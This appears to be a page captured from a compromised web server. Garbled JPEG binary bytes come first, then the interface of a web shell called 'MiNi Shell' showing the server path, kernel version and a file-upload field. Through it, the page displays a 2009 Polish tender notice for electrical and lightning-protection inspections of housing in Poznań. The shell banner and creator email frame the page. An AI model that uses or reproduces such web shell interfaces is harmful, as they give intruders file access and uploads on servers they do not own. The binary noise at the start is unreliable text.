JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090923/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090923/162477-N-2009.html

<p class="kh_header"><b>Poznań: Wykonanie okresowych przeglądów instalacji elektrycznej oraz instalacji odgromowej</b><br>
<b>Numer ogłoszenia: 162477 - 2009; data zamieszczenia: 23.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Gospodarki Mieszkaniowej Spółka Akcyjna , ul. Rybaki 18a, 61-884 Poznań, woj. wielkopolskie, tel. 061 6579000, faks 061 6579009.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpgm.poznan.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Osoba prawna utworzona w celu zaspokajania potrzeb o charakterze powszechnym.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie okresowych przeglądów instalacji elektrycznej oraz instalacji odgromowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie okresowych przeglądów instalacji elektrycznej budynków, mieszkań i lokali użytkowych w zakresie stanu instalacji elektrycznej i odgromowej, zgodnie z art. 62 ust.1 pkt 2 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity: Dz. U. 2006 rok, Nr 156, poz. 1118),  wraz ze sporządzeniem protokołów dla lokali zbadanych w zasobach administrowanych przez Miejskie Przedsiębiorstwo Gospodarki Mieszkaniowej S.A. z siedzibą w Poznaniu, wg załączonych wykazów stanowiących załączniki Nr 1 do odpowiednich wzorów umów znajdujących się w części II SIWZ.
2. Przedmiot zamówienia podzielony został na trzy części:
2.1. Część I - wykonanie okresowych przeglądów instalacji elektrycznej budynków i lokali wskazanych w załączniku nr 1 do wzoru umowy o wykonanie zamówienia publicznego, części I, umieszczonego w części drugiej niniejszej SIWZ, w tym:
I. Wykonanie badań rezystancji izolacji:
a) wewnętrznych linii zasilających,
b) tablic rozdzielczych oraz wyłączników głównych,
c) instalacji administracyjnej klatek schodowych, piwnic, pralni i strychów,
d) instalacji oświetlenia podstawowego i gniazd wtyczkowych 230V w mieszkaniach,
e) obwodów ogrzewania elektrycznego (pomieszczeń i wody).
II. Wykonanie badań skuteczności ochrony przeciwporażeniowej dodatkowej:
a) tablic rozdzielczych głównych, administracyjnych i piętrowych,
b) instalacji administracyjnej oświetleniowej i gniazd wtyczkowych 230V,
c) w mieszkaniach - obwody gniazd wtyczkowych.
III. Wykonanie kontroli w zakresie:
a) połączeń widocznych części przewodów, osprzętu i zabezpieczeń,
b) tablic rozdzielczych [obudów, drzwiczek tablic, napisów informacyjnych itp.],
c) instalacji wewnętrznych linii zasilających,
d) instalacji administracyjnej w częściach wspólnych,
e) instalacji odbiorczych w mieszkaniach.
2.2.Część II - Sprawdzenie i zakres oględzin instalacji odgromowej - piorunochronnej budynków wskazanych w załączniku nr 1 do wzoru umowy o wykonanie zamówienia publicznego, części II, umieszczonego w części drugiej niniejszej SIWZ, w tym:
a) stan wszystkich połączeń oraz mocowań zwłaszcza na poziomie ziemi,
b) zachowanie wymaganych bezpiecznych odstępów pomiędzy elementami urządzenia piorunochronnego a chronionymi urządzeniami lub elementami konstrukcji obiektu,
c) stan połączeń wyrównawczych wewnątrz obiektu,
d) stan urządzeń ograniczających przepięcia oraz chroniących je bezpieczników,
e) w przypadku zmian, prawidłowość wykonania nowych części instalacji zewnętrznej oraz wewnętrznej w obiekcie.
2.3.Część III - wykonanie okresowych przeglądów instalacji elektrycznej budynków i lokali wskazanych w załączniku nr 1 do wzoru umowy o wykonanie zamówienia publicznego, części II, umieszczonego w części drugiej niniejszej SIWZ, w zakresie wskazanym w pkt 2.1. niniejszego ogłoszenia.
3. W przypadku, gdy Wykonawca nie wykona badań w lokalach w danym budynku z powodu nieobecności najemcy lub właścicieli zobowiązany będzie do uzupełnienia przeglądów w tych lokalach w terminie 14 dni od dnia podjęcia ostatniej próby. 
W przypadku trzech nieskutecznych prób dostępu do lokalu, Wykonawca powiadomi na piśmie właściwy BOM w terminie 7 dni od dnia podjęcia ostatniej próby. Zamawiający uprawniony będzie do obniżenia wynagrodzenia Wykonawcy stosownie od liczby lokali, w których nie wykonano przeglądu.
4. Czynności stanowiące przedmiot zamówienia winny być wykonywane pod nadzorem osoby posiadającej wymagane przepisami uprawnienia elektryczne grupy D (tj. kwalifikacje wymagane przy wykonywaniu dozoru nad eksploatacją urządzeń, instalacji oraz sieci energetycznych), udokumentowane legitymacją ważną do czasu realizacji przedmiotu zamówienia, zapewniającą odpowiednią koordynację i nadzór nad realizacją zamówienia wraz z uprawnieniami pomiarowymi SEP do 1 kV. Zamawiający wymaga, żeby na każdy BOM, przypadała, co najmniej jedna osoba posiadająca powyższe uprawnienia.
5. Wykonawca musi ponadto dysponować przynajmniej jedną osobą, która posiada uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie instalacji elektrycznych oraz udokumentowaną przynależność do Okręgowej Izby Inżynierów Budownictwa opłaconą składką członkowstwa do końca terminu realizacji prac objętych niniejszym zamówieniem. Osoba ta pełnić będzie nadzór nad wykonaniem prac, biorąc przy tym pełną odpowiedzialność za zakres i jakość wykonania przedmiotu zamówienia. 
6. Osoba, o której mowa w pkt 5 potwierdza przeprowadzenie kontroli poprzez złożenie podpisu na protokole pokontrolnym.
7. Dokumenty określone w pkt. 4 oraz 5 Wykonawca zobowiązany jest przedłożyć na każde wezwanie Zamawiającego w terminie 7 dni od daty wezwania. 
8. Wykonawcy składający ofertę na wykonanie części III zamówienia uprawnieni są do wykonania wizji lokalnej lokali objętych tą częścią zamówienia. Wizja lokalna dokonana będzie na koszt Wykonawcy, w terminie ustalonym uprzednio przez Wykonawcę i Zamawiającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.63.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki udziału w postępowaniu:
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia;
1.3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4. Nie podlegają wykluczeniu z niniejszego postępowania z przyczyn określonych w art. 24 ust. 1 i ust. 2 ustawy Pzp.

2. Opis sposobu dokonywania oceny spełnienia warunków:
2.1. Zamawiający uzna spełnienie warunków udziału w postępowaniu, o których mowa w pkt 1.1., jeżeli Wykonawca posiada uprawnienia do wykonywania działalności lub czynności, które będą wykonywane przy realizacji poszczególnych części zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2.2. Zamawiający uzna spełnienie warunków udziału w postępowaniu, o których mowa w pkt, 1.2 jeżeli Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia:
a) dysponuje lub będzie dysponować osobami posiadającą uprawnienia:
- do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie instalacji elektrycznych oraz udokumentowaną przynależność do Okręgowej Izby Inżynierów Budownictwa opłaconą składką członkowstwa do końca terminu realizacji prac objętych niniejszym zamówieniem. Osoba ta pełnić będzie nadzór nad wykonaniem prac, biorąc przy tym pełną odpowiedzialność za zakres i jakość wykonania przedmiotu zamówienia - minimum 1 osoba.
- uprawnienia elektryczne grupy D (tj. kwalifikacje wymagane przy wykonywaniu dozoru nad eksploatacją urządzeń, instalacji oraz sieci energetycznych), udokumentowane legitymacją ważną do czasu realizacji przedmiotu zamówienia, zapewniającą odpowiednią koordynację i nadzór nad realizacją zamówienia wraz z uprawnieniami pomiarowymi SEP do 1 kV. Zamawiający wymaga, żeby na każdy BOM, przypadała, co najmniej jedna osoba posiadająca powyższe uprawnienia.
Jednocześnie Wykonawca zobowiązany jest do złożenia pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonywania niniejszego zamówienia, jeżeli w wykazie, o którym mowa powyżej, Wykonawca wskazał osoby, którymi będzie dysponował.
2.3.	Zamawiający uzna spełnienie warunków udziału w postępowaniu, o których mowa w pkt 1.3. - 1.4., jeżeli Wykonawca złoży oświadczenie zgodne z treścią załącznika nr 2 do IDW.
2.4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że:
a) Warunki opisane w pkt 1.1. i 1.4. spełnia każdy Wykonawca z osobna.
b) Warunki opisane w pkt 1.2. i 1.3. Wykonawcy spełniają łącznie.
2.5. Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych, w pkt 11 IDW oświadczeń i dokumentów, wg. formuły spełnia - nie spełnia.
2.6. Okoliczności wykluczające z udziału w postępowaniu określają przepisy art. 24 ust. 1 i 2 ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu (jeżeli dotyczy):
1.1. Oświadczenia i dokumenty niezbędne do dokonania oceny spełniania warunków udziału w postępowaniu
1.1.1. Dla potwierdzenia spełnienia warunków udziału w postępowaniu, Wykonawcy winni przedłożyć niżej wymienione oświadczenia i dokumenty:
1.1.1.1. Oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 22 ust. 1 i pkt. 1-4 ustawy Pzp -  załącznik nr 2 do IDW.
1.1.1.2. Wypełniony formularz oferty - załącznik nr 1 do IDW.
1.1.1.3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 1 miesiąc przed upływem terminu składania ofert.
1.1.1.4. Wykaz osób wraz z kserokopią dokumentów potwierdzających kwalifikacje zawodowe potwierdzone za zgodność z oryginałem, które będą wykonywać zamówienie wraz z informacjami na temat ich kwalifikacji, oraz zakresem wykonywanych czynności - załącznik Nr 3 do IDW.
1.1.1.5. Dokumenty w przypadku Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2006 r., Nr 87, poz. 605), składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości oraz nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji własnego organu Dokumenty, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokumenty, potwierdzające, ze nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji własnego organu powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
1.1.1.6. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepisy dotyczące terminów określonych w pkt. 1.1.1.5. IDW stosuje się odpowiednio.
1.2. Oświadczenia i dokumenty składane w ofercie w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: 
1.2.1. Oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 22 ust. 1 i pkt. 1-4 ustawy Pzp - załącznik nr 2 do IDW.
1.2.2. Oświadczenie wymienione w pkt 1.1.1.1. powinno być przedłożone przez każdego Wykonawcę z osobna.
1.2.3. Dokumenty wymienione w punktach, 1.1.1.3. (lub w pkt. 1.1.1.5., jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej), winny być przedłożone przez każdego Wykonawcę z osobna.
1.2.4. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni ustanowić Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego. W tym celu do oferty musi zostać dołączone stosowne pełnomocnictwo dla Pełnomocnika podpisane przez wszystkich wspólnie ubiegających się o zamówienie Wykonawców.
1.2.5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, w przypadku wybrania ich oferty, zobowiązani będą do przedłożenia Zamawiającemu (jeszcze przed podpisaniem umowy w sprawie zamówienia publicznego), umowy regulującej współpracę tych Wykonawców w zakresie realizacji zamówienia publicznego, którego dotyczy niniejsza SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mpgm.poznan.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Gospodarki Mieszkaniowej Spółka Akcyjna ul. Rybaki 18a, 61-884 Poznań, pokój 230..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.10.2009 godzina 10:00, miejsce: Miejskie Przedsiębiorstwo Gospodarki Mieszkaniowej Spółka Akcyjna ul. Rybaki 18a, 61-884 Poznań, pokój 230..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie okresowych przeglądów instalacji elektrycznej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1. Przedmiotem zamówienia jest wykonanie okresowych przeglądów instalacji elektrycznej budynków, mieszkań i lokali użytkowych w zakresie stanu instalacji elektrycznej, zgodnie z art. 62 ust.1 pkt 2 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity: Dz. U. 2006 rok, Nr 156, poz. 1118),  wraz ze sporządzeniem protokołów dla lokali zbadanych w zasobach administrowanych przez Miejskie Przedsiębiorstwo Gospodarki Mieszkaniowej S.A. z siedzibą w Poznaniu, wg załączonych wykazów stanowiących załączniki Nr 1 do odpowiednich wzorów umów znajdujących się w części II SIWZ.
1.2. Wykonanie okresowych przeglądów instalacji elektrycznej budynków i lokali wskazanych w załączniku nr 1 do wzoru umowy o wykonanie zamówienia publicznego, części I, umieszczonego w części drugiej niniejszej SIWZ, w tym:
I. Wykonanie badań rezystancji izolacji:
a) wewnętrznych linii zasilających,
b) tablic rozdzielczych oraz wyłączników głównych,
c) instalacji administracyjnej klatek schodowych, piwnic, pralni i strychów,
d) instalacji oświetlenia podstawowego i gniazd wtyczkowych 230V w mieszkaniach,
e) obwodów ogrzewania elektrycznego (pomieszczeń i wody).
II. Wykonanie badań skuteczności ochrony przeciwporażeniowej dodatkowej:
a) tablic rozdzielczych głównych, administracyjnych i piętrowych,
b) instalacji administracyjnej oświetleniowej i gniazd wtyczkowych 230V,
c) w mieszkaniach - obwody gniazd wtyczkowych.
III. Wykonanie kontroli w zakresie:
a) połączeń widocznych części przewodów, osprzętu i zabezpieczeń,
b) tablic rozdzielczych [obudów, drzwiczek tablic, napisów informacyjnych itp.],
c) instalacji wewnętrznych linii zasilających,
d) instalacji administracyjnej w częściach wspólnych,
e) instalacji odbiorczych w mieszkaniach..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.63.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie okresowych przeglądów instalacji odgromowej..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1. Przedmiotem zamówienia jest wykonanie okresowych przeglądów instalacji elektrycznej budynków, mieszkań i lokali użytkowych w zakresie stanu instalacji elektrycznej, zgodnie z art. 62 ust.1 pkt 2 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity: Dz. U. 2006 rok, Nr 156, poz. 1118),  wraz ze sporządzeniem protokołów dla lokali zbadanych w zasobach administrowanych przez Miejskie Przedsiębiorstwo Gospodarki Mieszkaniowej S.A. z siedzibą w Poznaniu, wg załączonych wykazów stanowiących załączniki Nr 1 do odpowiednich wzorów umów znajdujących się w części II SIWZ.
1.2.	Sprawdzenie i zakres oględzin instalacji odgromowej - piorunochronnej budynków wskazanych w załączniku nr 1 do wzoru umowy o wykonanie zamówienia publicznego, części II, umieszczonego w części drugiej SIWZ, w tym:
a) stan wszystkich połączeń oraz mocowań zwłaszcza na poziomie ziemi,
b) zachowanie wymaganych bezpiecznych odstępów pomiędzy elementami urządzenia piorunochronnego a chronionymi urządzeniami lub elementami konstrukcji obiektu,
c) stan połączeń wyrównawczych wewnątrz obiektu,
d) stan urządzeń ograniczających przepięcia oraz chroniących je bezpieczników,
e) w przypadku zmian, prawidłowość wykonania nowych części instalacji zewnętrznej oraz wewnętrznej w obiekcie..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.63.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie okresowych przeglądów instalacji elektrycznej..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1. Przedmiotem zamówienia jest wykonanie okresowych przeglądów instalacji elektrycznej budynków, mieszkań i lokali użytkowych w zakresie stanu instalacji elektrycznej, zgodnie z art. 62 ust.1 pkt 2 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity: Dz. U. 2006 rok, Nr 156, poz. 1118),  wraz ze sporządzeniem protokołów dla lokali zbadanych w zasobach administrowanych przez Miejskie Przedsiębiorstwo Gospodarki Mieszkaniowej S.A. z siedzibą w Poznaniu, wg załączonych wykazów stanowiących załączniki Nr 1 do odpowiednich wzorów umów znajdujących się w części II SIWZ.
1.2. Wykonanie okresowych przeglądów instalacji elektrycznej budynków i lokali wskazanych w załączniku nr 1 do wzoru umowy o wykonanie zamówienia publicznego, części III, umieszczonego w części drugiej SIWZ, w zakresie:
I. Wykonanie badań rezystancji izolacji:
a) wewnętrznych linii zasilających,
b) tablic rozdzielczych oraz wyłączników głównych,
c) instalacji administracyjnej klatek schodowych, piwnic, pralni i strychów,
d) instalacji oświetlenia podstawowego i gniazd wtyczkowych 230V w mieszkaniach,
e) obwodów ogrzewania elektrycznego (pomieszczeń i wody).
II. Wykonanie badań skuteczności ochrony przeciwporażeniowej dodatkowej:
a) tablic rozdzielczych głównych, administracyjnych i piętrowych,
b) instalacji administracyjnej oświetleniowej i gniazd wtyczkowych 230V,
c) w mieszkaniach - obwody gniazd wtyczkowych.
III. Wykonanie kontroli w zakresie:
a) połączeń widocznych części przewodów, osprzętu i zabezpieczeń,
b) tablic rozdzielczych [obudów, drzwiczek tablic, napisów informacyjnych itp.],
c) instalacji wewnętrznych linii zasilających,
d) instalacji administracyjnej w częściach wspólnych,
e) instalacji odbiorczych w mieszkaniach..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.63.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com